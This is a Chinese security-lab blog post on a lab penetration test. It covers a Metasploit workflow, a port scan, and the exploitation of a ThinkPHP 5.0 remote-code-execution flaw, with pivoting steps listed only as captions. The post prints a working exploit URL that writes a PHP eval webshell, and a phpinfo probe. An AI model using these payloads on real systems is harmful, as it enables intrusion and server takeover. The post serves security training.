当前位置 博文首页 > Ms08067安全实验室:利用Metasploit 打入ThinkPHP内网...
出品|MS08067实验室(www.ms08067.com)
本文作者:dch(Ms08067实验室 SRSP TEAM小组成员)
??Metasploit渗透流程
(1)通过msfconsole命令启动Metasploit在这个过程中,系统会主动加载数据库,如图2所示:
??启动Metasploit
(2)使用辅助模块进行端口扫描,如下图所示:
??进行扫描
(3)寻找合适的漏洞利用模块并使用,如下图所示:
??加载模块
(4)查看并修改参数,如下图所示:
??修改参数
(5)利用漏洞 Exploi,如下图所示:
??漏洞利用
(1)目标地址 192.168. 222 130
(2)攻击地址 192.168. 238.129
??端口扫描
通过扫描可以看到Target1发现开放了21(ftp)、22(ssh)、80(http )、111(RPC)、888 (http)、3306(Mysql)、8888(http)这些端口服务,且是一个Linux 的操作系统。
??web界面
打开后发现它是ThinkPHP框架,版本是V5.0,这时候想到它存在一个
RCE(远程命令执行)漏洞,先用POC(利用程序)测试一下
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
结果如下图所示
??进行漏洞测试
http://192.168.222.130/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST['cmd']);?>" > cmd.php
??成功获得shell
??查看系统信息
??查看攻击机IP
??制作后门
??msf设置监听
??上传shell.elf后门文件
??赋予777权限执行
??获得meterpreter
??查看可用网段
??添加第二层路由
??查看存活主机
??出现第二层网址
??设置代理
通过设置代理,进行下一步的内网渗透
??https://www.anquanke.com/post/id/170649
?
?
?
微信联系方式:cos2606596924
满足以下要求均可尝试
1.至少会一门编程语言
2.漏洞平台上提交过漏洞超过20个
3.每月一文章分享(考虑有些要上班)?
?
?
?
?
转载请联系作者并注明出处!
Ms08067安全实验室专注于网络安全知识的普及和培训。团队已出版《Web安全攻防:渗透测试实战指南》,《内网安全攻防:渗透测试实战指南》,《Python安全攻防:渗透测试实战指南》,《Java代码安全审计(入门篇)》等书籍。
团队公众号定期分享关于CTF靶场、内网渗透、APT方面技术干货,从零开始、以实战落地为主,致力于做一个实用的干货分享型公众号。
官方网站:https://www.ms08067.com/
扫描下方二维码加入实验室VIP社区
加入后邀请加入内部VIP群,内部微信群永久有效!
??
??